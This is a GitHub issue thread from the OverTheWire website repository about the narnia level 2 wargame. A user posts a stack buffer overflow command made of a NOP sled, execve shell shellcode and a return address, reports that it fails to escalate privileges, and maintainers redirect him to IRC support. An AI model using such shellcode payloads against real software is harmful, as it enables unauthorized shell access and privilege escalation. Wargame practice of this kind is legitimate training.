### ISSUE TITLE
narnia level-2

### ISSUE THREAD

**Issue by Tikam02** [OverTheWireOrg/OverTheWire-website#92]
Level 2 -->Displaying Level 2 when Doing whoami in /bin/sh.
I think it should be whoami ---> narnia3

narnia2@narnia:/narnia$ ./narnia2 $(python -c'print "\x90"*115 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\xf0\xd7\xff\xff"')
$ cat /etc/narnia_pass/narnia3
cat: /etc/narnia_pass/narnia3: Permission denied
$ whoami
narnia2
$

**Comment by morla10111** [comment]
Hey,
this in not the support channel for the games. I can assure you the level is working. If you need support please consider joining the IRC channel.

regards,
morla

**Comment by Tikam02** [comment]
@morla10111 can you please provide me IRC channel address

**Comment by morla10111** [comment]
http://overthewire.org/about/contact.html

I will try to make this more clear on the website.
